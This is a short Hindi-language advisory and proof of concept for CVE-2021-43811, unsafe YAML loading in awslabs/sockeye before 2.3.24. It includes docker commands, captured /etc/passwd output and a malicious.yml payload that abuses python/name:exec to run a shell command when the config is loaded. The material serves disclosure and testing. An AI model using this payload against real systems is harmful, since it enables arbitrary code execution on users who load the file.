
awslabs/sockeye असुरक्षित YAML लोडिंग द्वारा कोड इंजेक्शन CVE-2021-43811
awslabs/sockeye असुरक्षित YAML लोडिंग के माध्यम से कोड इंजेक्शन CVE-2021-43811
Sockeye एक ओपन-सोर्स सीक्वेंस-टू-सीक्वेंस फ्रेमवर्क है जो PyTorch पर निर्मित न्यूरल मशीन अनुवाद के लिए है। Sockeye मॉडल और डेटा कॉन्फ़िगरेशन को डिस्क पर संग्रहीत करने के लिए YAML का उपयोग करता है। 2.3.24 से नीचे के संस्करण असुरक्षित YAML लोडिंग का उपयोग करते हैं, जिसे कॉन्फ़िग फ़ाइलों में एम्बेडेड मनमाना कोड निष्पादित करने के लिए बनाया जा सकता है। एक हमलावर प्रशिक्षित मॉडल की कॉन्फ़िग फ़ाइल में दुर्भावनापूर्ण कोड जोड़ सकता है और उपयोगकर्ताओं को इसे डाउनलोड और चलाने के लिए राजी करने का प्रयास कर सकता है। यदि उपयोगकर्ता मॉडल चलाते हैं, तो एम्बेडेड कोड स्थानीय रूप से चलेगा। यह समस्या संस्करण 2.3.24 में ठीक की गई है।

docker build -t cve-2021-43811 .
docker run -it --rm cve-2021-43811
आउटपुट /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"